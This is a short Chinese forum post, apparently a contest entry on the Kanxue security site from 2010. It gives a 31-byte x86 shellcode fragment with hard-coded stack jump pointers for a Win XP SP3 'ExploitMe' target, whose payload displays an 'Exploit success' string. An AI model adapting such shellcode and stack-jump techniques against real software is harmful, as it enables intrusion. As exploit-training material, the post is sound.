-
-
[原创]交卷,还是提交个稳定的版本吧
-
发表于:
2010-10-19 19:28
3131
-
太多硬编码不能行,过度追求字节数而不稳定这就违背了信息安全的主旨了,所以提交的这个答卷除了堆栈跳转不得不硬编码之外,其他都是偏移量,完全稳定,在Win XP SP3下通过
堆栈基址是 0x00140000,如果是在堆栈基址是0x00130000的机器调试,需要修改两个跳转指针
dd xx xx xx 00 ;指针2
5a pop edx
6a 00 push 0
ff 72 57 push dword ptr [edx + 57] ;"ExploitMe"
83 c2 60 add edx, 0x60
ff d2 call edx
dd 45 00 78 00 70 00 6c 00 6f 00 69 00 74 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 00 00 ;字符串
dd xx xx xx 00 ;指针1
共31个非零字节
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
